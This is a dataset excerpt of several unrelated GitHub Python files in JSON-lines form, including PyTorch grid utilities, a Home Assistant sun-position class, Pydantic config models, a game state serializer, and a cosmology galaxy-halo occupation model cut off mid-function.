grid_y.repeat(B, 1, X)\n\n grid_x = torch.linspace(0.0, X-1, X, device=device)\n grid_x = torch.reshape(grid_x, [1, 1, X])\n grid_x = grid_x.repeat(B, Y, 1)\n\n if norm:\n grid_y, grid_x = normalize_grid2D(\n grid_y, grid_x, Y, X)\n\n if stack:\n # note we stack in xy order\n # (see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n grid = torch.stack([grid_x, grid_y], dim=-1)\n return grid\n else:\n return grid_y, grid_x\n\ndef meshgrid3D(B, Z, Y, X, stack=False, norm=False, device=None):\n # returns a meshgrid sized B x Z x Y x X\n if device is not None:\n grid_z = torch.linspace(0.0, Z-1, Z).to(device).contiguous()\n grid_y = torch.linspace(0.0, Y-1, Y).to(device).contiguous()\n grid_x = torch.linspace(0.0, X-1, X).to(device).contiguous()\n else:\n grid_z = torch.linspace(0.0, Z-1, Z, device=DEVICE).contiguous()\n grid_y = torch.linspace(0.0, Y-1, Y, device=DEVICE).contiguous()\n grid_x = torch.linspace(0.0, X-1, X, device=DEVICE).contiguous()\n\n grid_z = torch.reshape(grid_z, [1, Z, 1, 1])\n grid_z = grid_z.repeat(B, 1, Y, X)\n\n grid_y = torch.reshape(grid_y, [1, 1, Y, 1])\n grid_y = grid_y.repeat(B, Z, 1, X)\n\n grid_x = torch.reshape(grid_x, [1, 1, 1, X])\n grid_x = grid_x.repeat(B, Z, Y, 1)\n\n if norm:\n grid_z, grid_y, grid_x = normalize_grid3D(\n grid_z, grid_y, grid_x, Z, Y, X)\n\n if stack:\n # note we stack in xyz order\n # (see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n grid = torch.stack([grid_x, grid_y, grid_z], dim=-1)\n return grid\n else:\n return grid_z, grid_y, grid_x\n\ndef meshgrid3D_py(Z, Y, X, stack=False, norm=False):\n grid_z = np.linspace(0.0, Z-1, Z)\n grid_z = np.reshape(grid_z, [Z, 1, 1])\n grid_z = np.tile(grid_z, [1, Y, X])\n\n grid_y = np.linspace(0.0, Y-1, Y)\n grid_y = np.reshape(grid_y, [1, Y, 1])\n grid_y = np.tile(grid_y, [Z, 1, X])\n\n grid_x = np.linspace(0.0, X-1, X)\n grid_x = np.reshape(grid_x, [1, 1, X])\n grid_x = np.tile(grid_x, [Z, Y, 1])\n\n if norm:\n grid_z, grid_y, grid_x = normalize_grid3D(\n grid_z, grid_y, grid_x, Z, Y, X)\n\n if stack:\n # note we stack in xyz order\n # (see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n grid = np.stack([grid_x, grid_y, grid_z], dim=-1)\n return grid\n else:\n return grid_z, grid_y, grid_x\n\ndef sub2ind(height, width, y, x):\n return y*width + x\n\ndef sql2_on_axis(x, axis, keepdim=True):\n return torch.sum(x**2, axis, keepdim=keepdim)\n\ndef l2_on_axis(x, axis, keepdim=True):\n return torch.sqrt(EPS + sql2_on_axis(x, axis, keepdim=keepdim))\n\ndef l1_on_axis(x, axis, keepdim=True):\n return torch.sum(torch.abs(x), axis, keepdim=keepdim)\n\ndef sub2ind3D(depth, height, width, d, h, w):\n # when gathering/scattering with these inds, the tensor should be Z x Y x X\n return d*height*width + h*width + w\n\ndef gradient3D(x, absolute=False, square=False):\n # x should be B x C x D x H x W\n dz = x[:, :, 1:, :, :] - x[:, :, :-1, :, :]\n dy = x[:, :, :, 1:, :] - x[:, :, :, :-1, :]\n dx = x[:, :, :, :, 1:] - x[:, :, :, :, :-1]\n\n # zeros = tf.zeros_like(x)\n zeros = torch.zeros_like(x)\n zero_z = zeros[:, :, 0:1, :, :]\n zero_y = zeros[:, :, :, 0:1, :]\n zero_x = zeros[:, :, :, :, 0:1]\n dz = torch.cat([dz, zero_z], axis=2)\n dy = torch.cat([dy, zero_y], axis=3)\n dx = torch.cat([dx, zero_x], axis=4)\n if absolute:\n dz = torch.abs(dz)\n dy = torch.abs(dy)\n dx = torch.abs(dx)\n if square:\n dz = dz ** 2\n dy = dy ** 2\n dx = dx ** 2\n return dz, dy, dx\n\ndef gradient2D(x, absolute=False, square=False):\n # x should be B x C x H x W\n dh = x[:, :, 1:, :] - x[:, :, :-1, :]\n dw = x[:, :, :, 1:] - x[:, :, :, :-1]\n\n # zeros = tf.zeros_like(x)\n zeros = torch.zeros_like(x)\n zero_h = zeros[:, :, 0:1, :]\n zero_w = zeros[:, :, :, 0:1]\n dh = torch.cat([dh, zero_h], axis=2)\n dw = torch.cat([dw, zero_w], axis=3)\n if absolute:\n dh = torch.abs(dh)\n dw = torch.abs(dw)\n if square:\n dh = dh ** 2\n dw = dw ** 2\n return dh, dw\n\ndef matmul2(mat1, mat2):\n return torch.matmul(mat1, mat2)\n\ndef matmul3(mat1, mat2, mat3):\n return torch.matmul(mat1, torch.matmul(mat2, mat3))\n\ndef downsample(img, factor):\n down = torch.nn.AvgPool2d(factor)\n img = down(img)\n return img\n\ndef l2_normalize(x, dim=1):\n # dim1 is the channel dim\n return F.normalize(x, p=2, dim=dim)\n\ndef assert_unpacked(B, S, shape_tuple):\n assert shape_tuple[0] == B, \"batch dimension does not match of unpacked\"\n assert shape_tuple[1] == S, \"sequence dimension does not match of unpacked\"\n\ndef assert_packed(B, S, shape_tuple):\n assert shape_tuple[0] == B*S, \"in packing the 0-th dimension does not equal B*S\"\n\ndef get_params(model_part):\n return [copy.deepcopy(p) for p in model_part.parameters()]\n\ndef check_equal(a, b):\n # first check that the length of the two list are equal\n assert len(a) == len(b), \"the list sizes are not equal for sure failing\"\n res = [torch.equal(p1, p2) for p1, p2 in zip(a, b)]\n return all(res)\n\ndef check_notequal(a, b):\n # here I still check that the lists are equal in length, since same subnet\n # params are being checked for not equality here\n assert len(a) == len(b), \"same network params should have same length\"\n res = [torch.equal(p1, p2) for p1, p2 in zip(a, b)]\n return not all(res)\n\ndef to_numpy(a):\n ## a is a tensor\n return a.cpu().numpy()\n\ndef save_voxel(voxel_, filename, THRESHOLD=0.5):\n S1 = voxel_.shape[2]\n S2 = voxel_.shape[1]\n S3 = voxel_.shape[0]\n\n binvox_obj = binvox_rw.Voxels(\n voxel_ >= THRESHOLD, # I am already in xyz\n dims = [S1, S2, S3],\n translate = [0.0, 0.0, 0.0],\n scale = 1.0,\n axis_order = 'xyz'\n )\n with open(filename, \"wb\") as f:\n binvox_obj.write(f)\n f.close()\n\ndef get_cuboid_corners(centers, D, H, W, maxD, maxH, maxW):\n \"\"\"\n centers is B, N, C (the grid coordinates I will consider centers)\n D, H, W: is the depth, height and width of the cuboid\n \"\"\"\n B, N, C = list(centers.shape)\n rounded_centers = torch.round(centers)\n assert rounded_centers[:, :, 0].max() <= maxW-1\n assert rounded_centers[:, :, 1].max() <= maxH-1\n assert rounded_centers[:, :, 2].max() <= maxD-1\n assert rounded_centers[:, :, 0].min() >= 0\n assert rounded_centers[:, :, 1].min() >= 0\n assert rounded_centers[:, :, 2].min() >= 0\n\n left_x = rounded_centers[:, :, 0] - W\n right_x = rounded_centers[:, :, 0] + W\n forward_y = rounded_centers[:, :, 1] + H\n backward_y = rounded_centers[:, :, 1] - H\n up_z = rounded_centers[:, :, 2] + D\n down_z = rounded_centers[:, :, 2] - D\n\n back_bottom_left_corner = torch.stack([down_z, backward_y, left_x], dim=2)\n back_top_left_corner = torch.stack([up_z, backward_y, left_x], dim=2)\n back_bottom_right_corner = torch.stack([down_z, backward_y, right_x], dim=2)\n back_top_right_corner = torch.stack([up_z, backward_y, right_x], dim=2)\n front_bottom_left_corner = torch.stack([down_z, forward_y, left_x], dim=2)\n front_top_left_corner = torch.stack([up_z, forward_y, left_x], dim=2)\n front_bottom_right_corner = torch.stack([down_z, forward_y, right_x], dim=2)\n front_top_right_corner = torch.stack([up_z, forward_y, right_x], dim=2)\n\n corners = torch.stack([back_bottom_left_corner, back_top_left_corner, back_bottom_right_corner,\\\n back_top_right_corner, front_bottom_left_corner, front_top_left_corner,\\\n front_bottom_right_corner, front_top_right_corner], dim=2)\n\n from IPython import embed; embed()\n\nif __name__ == '__main__':\n # test parameter not changing function\n paramA = torch.randn(32, 32, 32, requires_grad=True)\n paramB = copy.deepcopy(paramA)\n paramC = torch.randn(32, 32, 32, requires_grad=True)\n paramA, paramB, paramC = [paramA], [paramB], [paramC]\n\n res = check_equal(paramA, paramB) ## true\n res1 = check_equal(paramA, paramC) ## false\n res2 = check_equal(paramB, paramC) ## false\n res3 = check_notequal(paramA, paramC) ## true\n res4 = check_notequal(paramB, paramC) ## true\n res5 = check_notequal(paramA, paramB) ## false\n\n print(res, res1, res2, res3, res4, res5)\n\n Z, Y, X = 32, 32, 32\n grid = gridcloud3D_py(Z, Y, X)\n from IPython import embed; embed()\n","repo_name":"YunchuZhang/Visually-Grounded-Library-of-Behaviors","sub_path":"pytorch_disco/utils/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"22535562963","text":"#WAP to take name and the contact number from user and check whether it is correct value or not.\r\n\r\n\r\n\r\nname=input(\"Enter your name: \\n\")\r\n\r\nnumber=input(\"Enter your mobile number: \\n\")\r\n\r\nif (len(name)>2 and len(number)==10):\r\n print(\"correct details\")\r\nelse:\r\n print(\"wrong details\")\r\n\r\n\r\n \r\n","repo_name":"ImOmkar/Python","sub_path":"assign10.py","file_name":"assign10.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1198749345","text":"\"\"\"Fetch sun data.\"\"\"\nfrom datetime import date, timedelta, datetime\nimport pandas as pd\nfrom homeassistant.helpers.sun import get_astral_location\nfrom homeassistant.core import HomeAssistant\n\n\nclass SunData:\n \"\"\"Access local sun data.\"\"\"\n\n def __init__(self, timezone, hass: HomeAssistant) -> None: # noqa: D107\n self.hass = hass\n location, elevation = get_astral_location(self.hass)\n self.location = location # astral.location.Location\n self.elevation = elevation\n self.timezone = timezone\n\n @property\n def times(self) -> pd.DatetimeIndex:\n \"\"\"Define time interval.\"\"\"\n start_date = date.today()\n end_date = start_date + timedelta(days=1)\n\n times = pd.date_range(\n start=start_date, end=end_date, freq=\"5min\", tz=self.timezone\n )\n return times\n\n @property\n def solar_azimuth(self) -> list:\n \"\"\"Create list with solar azimuth data per 5 minutes.\"\"\"\n index = 0\n azi_list = []\n for _i in self.times:\n azi_list.append(\n self.location.solar_azimuth(self.times[index], self.elevation)\n )\n index += 1\n return azi_list\n\n @property\n def solar_elevation(self) -> list:\n \"\"\"Create list with solar elevation data per 5 minutes.\"\"\"\n index = 0\n ele_list = []\n for _i in self.times:\n ele_list.append(\n self.location.solar_elevation(self.times[index], self.elevation)\n )\n index += 1\n return ele_list\n\n def sunset(self) -> datetime:\n \"\"\"Fetch sunset time.\"\"\"\n return self.location.sunset(date.today(), local=False)\n\n # def df_today(self)-> pd.DataFrame:\n # \"\"\"Create dataframe with azimuth and elevation data\"\"\"\n # df_today = pd.DataFrame({\"azimuth\":self.solar_azimuth, \"elevation\":self.solar_elevation})\n # df_today = df_today.set_index(self.times)\n # return df_today\n","repo_name":"basbruss/adaptive-cover","sub_path":"custom_components/adaptive_cover/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5939632241","text":"import uuid\nfrom datetime import datetime\nfrom typing import Optional, List\nimport pytz\n\nfrom pydantic import BaseModel, Field, root_validator\n\n\nclass SASchedule(BaseModel):\n sa_id: str = Field(...)\n on: List[datetime] = Field(...)\n off: List[datetime] = Field(...)\n\n\nclass SensorSchedule(BaseModel):\n sensor_id: str = Field(...)\n interval: float = Field(...)\n\n\nclass RASchedule(BaseModel):\n ra_id: str = Field(...)\n interval: float = Field(...)\n threshold: float = Field(...)\n duration: float = Field(...)\n threshold_type: int = Field(...) # 1: ceiling, 0: floor\n\n\nclass Config(BaseModel):\n id: str = Field(default_factory=uuid.uuid4, alias=\"_id\")\n name: str = Field(...)\n sensor_schedule: List[SensorSchedule] = Field(...)\n ra_schedule: List[RASchedule] = Field(...)\n sa_schedule: List[SASchedule] = Field(...)\n created_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n updated_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"_id\": \"b67cd1cf-e113-40cf-a293-ba80251e03ce\",\n \"name\": \"TestConfig\",\n \"sensor_schedule\": [\n {\n \"sensor_id\": \"66608a32-a24c-4b70-ae2c-c46c586ea0c3\",\n \"interval\": 300.0,\n }\n ],\n \"ra_schedule\": [\n {\n \"ra_id\": \"5e9b44c7-970a-41f0-8ef4-e4dbf82f00c3\",\n \"interval\": 1200.0,\n \"threshold\": 7.5,\n \"duration\": 5.0,\n \"threshold_type\": 1,\n }\n ],\n \"sa_schedule\": [\n {\n \"sa_id\": \"15a2a241-cf21-4365-af45-3d140712f2b8\",\n \"on\": [\n \"2023-02-17T08:09:50+00:00\",\n \"2023-02-17T16:09:50+00:00\",\n \"2023-02-17T20:09:50+00:00\",\n ],\n \"off\": [\n \"2023-02-17T08:29:50+00:00\",\n \"2023-02-17T16:29:50+00:00\",\n \"2023-02-17T20:29:50+00:00\",\n ],\n }\n ],\n \"created_at\": \"2023-02-18T21:15:12.005399\",\n \"updated_at\": \"2023-02-18T21:15:12.005400\",\n }\n }\n\n @root_validator\n def number_validator(cls, values):\n values[\"updated_at\"] = datetime.now(pytz.timezone(\"US/Eastern\"))\n return values\n\n\nclass ConfigUpdate(BaseModel):\n name: Optional[str]\n sensor_schedule: Optional[List[SensorSchedule]]\n ra_schedule: Optional[List[RASchedule]]\n sa_schedule: Optional[List[SASchedule]]\n updated_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"Config 1\",\n \"sensor_schedule\": [{\"sensor_id\": \"abc\", \"interval\": 400}],\n }\n }\n","repo_name":"Olin-Hydro/hydrangea","sub_path":"app/models/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72574172707","text":"def BuyMe(prefix=\"Please buy me\", what=\"something nice.\"):\n print(prefix, what)\n\n\nBuyMe(\"Please buy me\", \"a new car.\")\nBuyMe(what=\"a new car.\", prefix=\"Please buy me\")\nBuyMe(\"Please\")\nBuyMe(prefix=\"Please buy me\")\nBuyMe(what=\"something sweet.\")\n\ncarBrand = \"Seat\"\ncarModel = \"Ibiza\"\ncarIsAirbagOk = True\ncarIsPaintingOk = True\ncarIsMechanicOk = True\n\n\ndef printIsCarDamged(carIsAirbagOk, carIsPaintingOk, carIsMechanicOk):\n return not (carIsAirbagOk and carIsPaintingOk and carIsMechanicOk)\n\n\nprint(printIsCarDamged(carIsAirbagOk, carIsPaintingOk, carIsMechanicOk))\n","repo_name":"matisarnowski/Python-All","sub_path":"internet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15015536226","text":"import numpy as np\n# A = np.eye(137)\n# with open('TE/solar.txt','r') as f:\n# for line in f.readlines():\n# if not line:\n# continue\n# i,b = line.split('-')\n# print(i,b)\n# j,v = b.split(':')\n# A[int(i)][int(j)] = float(v)\n# print(A)\n# f1 = open('TE/so.txt','w')\n# for i in range(137):\n# for j in range(137):\n# f1.write(str(A[i,j])+' ')\n# f1.write('\\n')\n# f1.close()\nfile = 'data/exchange_rate.txt'\nA = np.loadtxt(file, delimiter=',').T\nf1 = open('ex_T.txt','w')\nfor i in range(A.shape[0]):\n for j in range(A.shape[1]):\n f1.write(str(A[i,j])+',')\n f1.write('\\n')\nf1.close()\nprint(A.shape)\n","repo_name":"RRRussell/CauGNN","sub_path":"TENet-master/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"23514666391","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom process_db_data.data_cleaning_utils import create_id_col\nfrom file_paths import processed_data\nimport process_db_data.process_utilization as utl\n\n\ndef process_er_only(update=True):\n \"\"\"\n Cleans/Processes dataset\n \n Indicated columns are dropped\n Column names are cleaned\n Training member is dropped\n Column added to indicate if admission is\n within 6 months of enrollment\n Day of week column is added\n Column to count days since last visit is created\n\n Returns:\n DataFrame: cleaned dataframe\n \n Outputs:\n csv: processed data files\n \"\"\"\n er_only = utl.load_utlization(\"er_only.csv\")\n\n er_only = utl.admission_within_6_mo(er_only, update=update)\n\n er_only = utl.admission_dow(er_only)\n\n er_only = utl.discharge_admit_diff(\n er_only, table_name=\"er_only\", update=False, admit_diff=True\n )\n\n er_only[\"visit_id\"] = create_id_col(\n er_only, [\"member_id\", \"admission_date\", \"facility\"], \"visit_id\"\n )\n\n cols_to_drop = [\n \"enrollment_date\",\n \"participant_name\",\n \"text_box5\",\n \"text_box2\",\n \"p_c_p\",\n \"center\",\n ]\n\n er_only.drop(cols_to_drop, axis=1, inplace=True)\n er_only.to_csv(f\"{processed_data}\\\\er_only.csv\", index=False)\n\n # utl_grid = load_clean_utl_grid(utl_type=\"er\")\n\n # update_utl_grid(utl_grid, er_only_merged, utl_type=\"er\")\n\n # merge_utl(utl_grid, er_only_merged, utl_filename=\"er_only\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--update\",\n default=True,\n help=\"Are we updating the database or creating it? True for update\",\n )\n\n arguments = parser.parse_args()\n\n process_er_only(**vars(arguments))\n","repo_name":"whatscottcodes/database_mgmt","sub_path":"code/process_db_data/process_er_only.py","file_name":"process_er_only.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30112978300","text":"n = int(input())\ncards=[]\narr = []\nfor _ in range(n):\n x = int(input())\n arr.append(x)\n if x not in cards:\n cards.append(x)\nif len(cards)!=2:\n print(\"NO\")\nelse:\n if arr.count(cards[0]) == arr.count(cards[1]):\n print(\"YES\")\n print(cards[0], cards[1])\n else:\n print(\"NO\")\n","repo_name":"rehan-bhatia/codeforces_div2_A","sub_path":"Fair Game.py","file_name":"Fair Game.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12496652507","text":"# Ref: 1973 Electron modecule collision ionization in hydrogen and deuterium\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nfilename_old = \"original/Ionization_Cu_to_Cu+1.dat\"\nfilename_new = \"data/Ionization_Cu_to_Cu+1.dat\"\ndata = np.loadtxt(filename_old)\nnp.savetxt(filename_new, data, fmt='%1.5e')\nplt.plot(data[:,0], data[:,1], label = \"Ionization_Cu_to_Cu+1\")\n\nplt.legend()\nplt.xlim((0.0, 500.0))\nplt.savefig(\"fig/Ionization_Cu.png\")\n","repo_name":"wphu/SmileiSE","sub_path":"tools/crossSection/Cu/Ionization_Cu.py","file_name":"Ionization_Cu.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"72125785186","text":"from Feedback import Feedback\nfrom InfinityStone import InfinityStone\nfrom Player import Player\n\n\nclass State:\n # This class is data given for users. for now penality score, feedback, movegen, player's troops info.\n def __init__(self, movegen: dict, feedback, penalty_score, round_no, player: Player,\n infinityStone: InfinityStone) -> None:\n self.__feedback = feedback\n self.__penalty_score = penalty_score\n self.__round_no = round_no\n self.__movegen = movegen\n self.__player = player\n self.__infinityStone = infinityStone\n\n def get_movegen(self):\n return self.__movegen\n\n def get_feedback(self):\n return self.__feedback\n\n def get_penality_score(self):\n return self.__penalty_score\n\n def json(self):\n movegen_as_json = {}\n for troop_name, troop in self.__movegen.items():\n neighbours = []\n if troop_name == \"StarLord\":\n starlord_list = []\n for side in troop[1]:\n side_list = []\n for curr_cell in side:\n side_list.append(curr_cell.get_coordinates())\n starlord_list.append(side_list)\n\n starLord_vision = Feedback(\"star_lord_special_power\", {\"special_vision\": starlord_list})\n self.__feedback.append(starLord_vision)\n troop = troop[0]\n\n for cell_list in troop:\n side = []\n for cell in cell_list:\n guardian_present_list = []\n for i in cell.get_guardians_present():\n if i.get_belongs_to_player().get_player_id() == self.__player.get_player_id():\n data = {\n \"belongs_to\": 'you',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n else:\n data = {\n \"belongs_to\": 'opponent',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n side.append({\"coordinates\": str(cell.get_coordinates()),\n \"cell_type\": cell.get_cell_type(),\n \"is_powerStone_present\": str(cell.get_coordinates(\n ) == self.__infinityStone.get_coordinates()),\n 'guardians_present': guardian_present_list})\n\n neighbours.append(side)\n #\n guardian = self.__player.get_guardian_by_type(troop_name)\n\n guardian_present_list = []\n for i in guardian.get_coordinates().get_guardians_present():\n if i.get_belongs_to_player().get_player_id() == self.__player.get_player_id():\n data = {\n \"belongs_to\": 'you',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n else:\n data = {\n \"belongs_to\": 'opponent',\n \"guardian_name\": i.get_type()\n }\n guardian_present_list.append(data)\n\n current_cell = {\"coordinates\": str(guardian.get_coordinates().get_coordinates()),\n \"cell_type\": guardian.get_coordinates().get_cell_type(),\n \"is_powerStone_present\": str(guardian.get_coordinates(\n ) == self.__infinityStone.get_coordinates()),\n 'guardians_present': guardian_present_list}\n\n movegen_as_json[troop_name] = {\"health\": guardian.get_health(), \"cooldown\": guardian.get_cooldown(),\n \"current_cell\": current_cell, \"neighbour_cells\": neighbours}\n\n feedback_as_json = []\n for feed in self.__feedback:\n feedback_as_json.append(feed.json())\n\n return {\n \"movegen\": movegen_as_json,\n \"feedback\": feedback_as_json,\n \"penalty_score\": self.__penalty_score,\n \"round_no\": self.__round_no\n }\n","repo_name":"Arvind-kumar-M-08/Groot","sub_path":"State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"38211901023","text":"from headers_constants import *\n\n\nclass ProfHODMore15:\n # def __init__(self, U, MassFunc):\n def __init__(self, data_var_iv, cosmo_var_iv, gal_exp):\n self.dv = data_var_iv\n self.uni = cosmo_var_iv\n self.mh = self.uni.mass\n self.z = self.uni.z # self.dv.z\n self.ell = self.dv.ell\n self.hmfmz = self.uni.hmf # self.dv.hmf\n # self.biasmz = self.uni.bias_m_z\n self.biasmz = self.uni.interp_bias(self.z)\n self.unfw = self.uni.interp_nfw(self.ell, self.z)\n # self.dn_dz = self.dv.dn_dz()\n # self.Pk = self.uni.pkinterpz(self.z)\n self.gal_exp = gal_exp\n \"\"\"HOD for CMASS\n from More Miyatake +15\n \"\"\"\n # HOD params, More+15, average of the 3 columns in Table 1\n self.alphaInc = 0.51\n self.log10mInc = 13.84\n # self.log10mMin = 12.7 # 12.00 # 13.42\n \"\"\"\n log10mMin determines somehow the minimum mass detectable by the survey.\n Of course, DESI survyes are going to detect galaxies much better than\n CMASS. So we need to go to lower lowest detectable mass than CMASS for\n these surveys. These values for DESI LRG and DESI ELG are determined\n such that total number of galaxies approximately detected (N_tot function below) by\n LRG in 0.4 < z < 1 are 10 times more than CMASS, ELG in 0.6 < z < 1.6\n are 30 times more than CMASS. For ExtDESI_ELG, we keep the number of\n galaxies detected as same as DESI ELG i.e. 30 times more than CMASS,\n but spread on abroader redshift range i.e. 0.6 < z < 3.2.\n \"\"\"\n if self.gal_exp == 'CMASS':\n self.log10mMin = 13.42\n elif self.gal_exp == 'DESI_LRG':\n self.log10mMin = 12.5\n elif self.gal_exp == 'DESI_ELG':\n self.log10mMin = 12.1\n elif self.gal_exp == 'ExtDESI_ELG':\n self.log10mMin = 12.7\n self.sLog10m = np.sqrt(0.49)\n self.kappa = 1.10\n self.mMinHod = 10.**(13.42)\n self.m1 = 10.**(14.43)\n self.alpha_ = 1.09\n self.pOff = 0.357\n self.rOff = 2.3\n\n self.mMin = 0.\n self.mMax = np.inf\n\n # self.galexp = gal_exp\n # super(ProfHODMore15, self).__init__(U, MassFunc)\n\n def __str__(self):\n return \"hodmore15\"\n\n# ############################################################################\n def dn_dz(self):\n if self.gal_exp == 'CMASS':\n # \"\"\"\n # this is CMASS data\n data = np.loadtxt(\"data_files/dn_dz_cmass.txt\")\n Z = data[:, 0]\n Dndz = data[:, 1]\n elif self.gal_exp == 'DESI_ELG' or self.gal_exp == 'DESI_LRG':\n # \"\"\"\n # DESI_ELG and DESI_LRG data. Please note however, we are using the same HOD as that\n # of CMASS derived in More+15. Not sure how good this approx is\n # DESi data in a redshift bin is number of galaxies per square\n # degrees.\n # 1. This can be converted into ngal i.e. angular number density\n # which is number of galaxies per unit steradian. To go from per\n # square degree to per steradian => divide by (pi/180)**2\n # 2. dN/dz which is number of galaxies per redshift per steradian. So\n # dN/dz = ngal/\\Delta z where \\Delta z is redshift bin width i.e. 0.1\n # in this case. and ngal is calculated as in number 1 step.\n # data = np.loadtxt(\"data_files/dndz_DESI_ELG.txt\")\n # data = np.loadtxt(\"data_files/dndz_DESI_LRG.txt\")\n data = np.loadtxt('data_files/dndz_'+self.gal_exp+'.txt')\n Z1, Z2 = data[:, 0], data[:, 1]\n Z = (Z1+Z2)/2.\n deltaz = Z2 - Z1\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n Dndz = ngal/deltaz\n else:\n data = np.loadtxt('data_files/dndz_DESI_ELG.txt')\n Z1, Z2 = data[:, 0], data[:, 1]\n Z = Z1+Z2\n deltaz = 2*(Z2 - Z1)\n # converting from per squre degrees to per steradian\n ngal = data[:, 2]/(np.pi/180.)**2\n # ngal *= 10\n Dndz = ngal/deltaz\n # \"\"\"\n f = UnivariateSpline(Z, Dndz, k=1, s=0, ext=1)\n dndz = lambda z: f(z) * (z >= np.min(Z)) * (z <= np.max(Z))\n return dndz\n\n def fInc(self, m):\n \"\"\"More+15 assume that for a given halo mass,\n a fixed fraction of CMASS galaxies are seen\n how physical is this?\n \"\"\"\n # m = self.mh\n result = np.min([1., 1.+self.alphaInc*(np.log10(m) - self.log10mInc)])\n result = np.max([0., result])\n return result\n\n def Ncen(self, m):\n \"\"\"number of central galaxies per halo, between 0 and 1\n \"\"\"\n # m = self.mh\n result = np.log10(m) - self.log10mMin\n result /= self.sLog10m\n result = 0.5*(1.+special.erf(result))\n result *= self.fInc(m)\n return result\n\n def Nsat(self, m):\n \"\"\"number of satellite galaxies per halo\n \"\"\"\n # m = self.mh\n result = (m - self.kappa * self.mMinHod)\n if result > 0.:\n result /= self.m1\n result **= self.alpha_\n result *= self.Ncen(m)\n else:\n result = 0.\n return result\n\n def nbargal(self):\n m = self.mh\n hmf = self.hmfmz\n N_g = np.zeros(len(m))\n for mm in range(len(m)):\n N_g[mm] = self.Ncen(m[mm])+self.Nsat(m[mm])\n dm = np.log10(m[1] / m[0])\n integral = hmf*N_g[:, None]\n return intg.simps(integral, dx=dm, axis=0, even='avg')\n\n def N_tot(self):\n z = self.z\n # nbarg = self.nbargal()\n fnbar = interp1d(z, self.nbargal(), kind='linear',\n bounds_error=False, fill_value=0.)\n if self.gal_exp == 'CMASS':\n zmin, zmax = 0.4, 0.7\n elif self.gal_exp == 'DESI_LRG':\n zmin, zmax = 0.4, 1.0\n elif self.gal_exp == 'DESI_ELG':\n zmin, zmax = 0.6, 1.6\n elif self.gal_exp == 'ExtDESI_ELG':\n zmin, zmax = 0.6, 3.2\n zint = np.linspace(zmin, zmax, 30)\n chi = self.uni.chi(zint)\n dchidz = self.uni.dchi_dz(zint)\n integral = fnbar(zint)*4*np.pi*chi**2*dchidz\n res = intg.simps(integral, x=zint, axis=0, even='avg')\n return res\n\n def Nbargal(self):\n Dndz = self.dn_dz()\n res = lambda z: intg.simps(Dndz(z), x=z, even='avg')\n return res\n\n def window_gal(self):\n dndz = self.dn_dz()\n nbarg = self.Nbargal()\n # this should be divided by dchi_dz() but as it is defined later, we\n # do the division later while calculating the total window func\n res = lambda z: dndz(z)/nbarg(z)\n return res\n\n def p1h_gal(self, ucen, unfw):\n m = self.mh\n z = self.z\n hmf = self.hmfmz\n # ucen = self.uni.self.nfw_u # unfw\n # unfw = self.uni.self.nfw_u # unfw\n num = np.zeros((len(unfw[0, :, 0]), len(m), len(z)))\n for mi in range(len(m)):\n num[:, mi, :] = 2*self.Ncen(m[mi])*ucen[mi, :, :]*self.Nsat(m[mi])*unfw[mi, :, :]\n num[:, mi, :] += (self.Nsat(m[mi])*unfw[mi, :, :])**2\n denom = self.nbargal()**2\n integral = hmf*num/denom\n # print (integral.shape)\n # print (np.shape(m))\n # dm = np.log10(m)\n dlog10m = np.log10(m[1] / m[0])\n res = intg.simps(integral, dx=dlog10m, axis=1, even='avg')\n return res\n\n def p2h_gal(self, ucen, unfw, power):\n m = self.mh\n z = self.z\n hmf = self.hmfmz\n # ucen = self.uni.self.nfw_u # unfw\n # unfw = self.uni.self.nfw_u # unfw\n biasmz = self.biasmz\n # power = self.uni.pkinterpz(self.z)\n \n num = np.zeros((len(unfw[0, :, 0]), len(m), len(z)))\n for mi in range(len(m)):\n num[:, mi, :] = self.Ncen(m[mi])*ucen[mi, :, :]+self.Nsat(m[mi])*unfw[mi, :, :]\n num *= 